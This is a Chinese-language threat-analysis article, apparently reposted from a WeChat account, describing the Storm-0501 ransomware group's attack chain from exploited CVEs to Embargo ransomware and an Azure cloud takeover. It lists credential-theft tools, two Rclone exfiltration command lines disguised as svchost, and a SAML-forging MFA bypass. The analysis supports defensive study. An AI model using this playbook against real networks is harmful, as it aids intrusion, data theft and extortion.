背景:
Storm-0501 是从2021年开始活跃的勒索组织,攻击目标多为米国的政府、制造业、运输和执法和医院。作为勒索软件即服务(RaaS)附属机构,部署过包括 Hive、BlackCat (ALPHV)、Hunters International、LockBit,以及最近的 Embargo 勒索软件。
攻击链路图:
获取驻足点:
- 使用Storm-0249 和 Storm-0900的代理隧道访问
- 使用Nday,如下表:
漏洞编号 | 漏洞名称 |
CVE-2022-47966 | ManageEngine 未授权RCE |
CVE-2023-4966 | Citrix NetScaler ADC 和 Gateway信息泄露 |
CVE-2023-29300 CVE-2023-38203 |
Adobe ColdFusion 反序列化漏洞 |
获取系统驻足点后信息收集:
-
系统工具:
-
systeminfo.exe
: 用于获取设备的系统配置信息。 -
net.exe
: 用于获取和管理网络资源。 -
nltest.exe
: 用于检测和操作域及信任信息。 -
tasklist.exe
: 用于查看正在运行的进程。 -
开源工具:
-
使用 ossec-win32 和 OSQuery收集终端信息。
-
自定义脚本:
-
使用经过混淆的ADRecon.ps1脚本(重命名为obfs.ps1或recon.ps1)进行域控信息收集。
取得本地设备的管理员权限后,继续使用以下方式获取更多用户凭据:
-
Impacket的SecretsDump模块
-
使用EncryptedStore的Find-KeePassConfig.ps1 PowerShell脚本,输出KeePass数据库的位置以及密钥文件/用户主密钥信息
数据外传:
-
Rclone工具:
-
MegaSync:
-
命令行示例:
-
Svhost.exe copy –filter-from [REDACTED] [REDACTED] config:[REDACTED] -q –ignore-existing –auto-confirm –multi-thread-streams 11 –transfers 11
-
scvhost.exe –config C:WindowsDebuga.conf copy [REDACTED UNC PATH] [REDACTED]
攻击者使用开源工具Rclone进行数据外传,并将其重命名为类似Windows系统文件的名称,如svhost.exe或scvhost.exe,以进行伪装。
使用MegaSync将文件多线程传输到公共云存储服务。
攻击者通过隐匿的多线程传输,将窃取的敏感数据从受感染设备中上传至云存储服务。
勒索软件部署
攻击者获取足够的权限并且拿到了敏感数据,部署双重勒索策略的Embargo勒索软件:先加密受害者的文件,然后使用被盗的敏感数据进行威胁,除非支付赎金。
Embargo勒索软件信息泄露网站
在微软观察到的案例中,攻击者利用被入侵的域管理员账户,通过GPO在网络设备上注册名为 SysUpdate 的计划任务来分发Embargo勒索软件,使用的二进制文件名为PostalScanImporter.exe和win.exe。目标设备上的文件被加密后,其扩展名会更改为 .partial、.564ba1 和 .embargo。
被加密后的文件
云环境渗透
攻击者利用窃取的Microsoft Entra ID(Azure AD)凭证,从本地环境横向移动到云环境,并通过后门在目标网络中建立持久访问,不再局限于受感染设备。
攻击者利用开源工具AADInternals,创建一个联合域并生成SAML令牌,以绕过多因素认证(MFA),登录各种应用(如Office 365等)。
开源工具AADInternals官网截图
原文始发于微信公众号(KeepHack1ng):Storm-0501 勒索组织攻击手法浅析
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论